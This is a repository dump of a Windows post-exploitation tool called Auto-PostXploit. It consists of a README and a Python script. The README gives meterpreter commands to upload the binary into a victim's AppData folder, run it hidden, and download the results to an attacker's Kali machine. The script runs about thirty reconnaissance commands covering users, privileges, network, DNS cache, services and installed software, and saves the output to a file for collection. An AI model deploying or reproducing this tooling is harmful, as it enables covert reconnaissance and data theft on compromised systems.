├── Auto-PostXploit.exe ├── README.md └── source.py /Auto-PostXploit.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BehzaDMagzer/Auto-PostXploit/bbf3822ed292d22fe05692b2479c22c99c20f128/Auto-PostXploit.exe -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Auto-PostXploit 2 | Windows Auto Post Exploitation - For ReD Team 3 | 4 | 5 | * https://github.com/emilyanncr/Windows-Post-Exploitation/ 6 | 7 | 8 | ## Download : 9 | 10 | 11 | - wget https://raw.githubusercontent.com/BehzaDMagzer/Auto-PostXploit/master/Auto-PostXploit.exe 12 | 13 | 14 | 15 | ## Usage : 16 | 17 | 18 | meterpreter > upload %path%/Auto-PostXploit.exe C:/Users/%USETNAME%/AppData 19 | 20 | meterpreter > execute -H -f C:/Users/%USERNAME%/AppData/Auto-PostXploit.exe 21 | 22 | #### If Auto-PostXploit.exe Not In Process 23 | 24 | meterpreter > download C:/Users/%USERNAME%/AppData/ginfo.txt /root/Desktop 25 | 26 | root@kali:~# cat /root/Desktop/ginfo.txt 27 | -------------------------------------------------------------------------------- /source.py: -------------------------------------------------------------------------------- 1 | #Author : BehzaDMagzer 2 | import os 3 | user_name=os.popen("echo %username%").read().replace('\n','') 4 | path_="C:\\Users\\{}\\AppData\\ginfo.txt".format(user_name) 5 | def oscommand(com,desk): 6 | res=os.popen(com).read().replace("\x00",'') 7 | res+="\n\n" 8 | title="--=[ {} ]=--\n\n".format(desk) 9 | f=open(path_,'a') 10 | f.write(title) 11 | f.write(res) 12 | f.close() 13 | commmands=[ 14 | ("netsh firewall show state","state of firewall") 15 | ,("whoami /all","user and privilege information") 16 | ,("net users","list users") 17 | ,("net accounts","net accounts") 18 | ,("gpresult /z","user settings") 19 | ,("systeminfo","system information") 20 | ,("ipconfig /all","ip configuration information") 21 | ,("route print","machines routing table") 22 | ,("ipconfig /displaydns","display the contents of the DNS resolver cache ") 23 | ,("arp -a","ARP table") 24 | ,("nbtstat -n","lists local NetBIOS names") 25 | ,("qwinsta /counter /vm","information about remote desktop dervices sessions") 26 | ,("net share","view shared resources on network") 27 | ,("fsutil fsinfo drives","drives on system") 28 | ,("tasklist /M","lists all tasks and dlls") 29 | ,("tasklist /V","displays verbose task information") 30 | ,("netstat -ano","to see what services are running on what ports") 31 | ,("netstat -r","displays the routing table") 32 | ,("net config workstation","information about the configuration of the workstation") 33 | ,("net start","view list processes started upon startup") 34 | ,("sc query state=all","enumerates all services & drivers") 35 | ,("wmic startup list full","view list processes started upon startup(wmic)") 36 | ,("wmic bios","show information about bios") 37 | ,("wmic qfe","show information about updates") 38 | ,("wmic service","show services") 39 | ,("wmic os","show information about os") 40 | ,("wmic process get caption,executablepath","show process") 41 | ,("wmic logicaldisk get name,freespace,systemname,filesystem,size,volumeserialnumber","show information about logicaldisk") 42 | ,("wmic useraccount get /all","") 43 | ,("wmic PRODUCT get name,version,installlocation","show list programs installed") 44 | ] 45 | for i in commmands: 46 | oscommand(i[0],i[1]) 47 | --------------------------------------------------------------------------------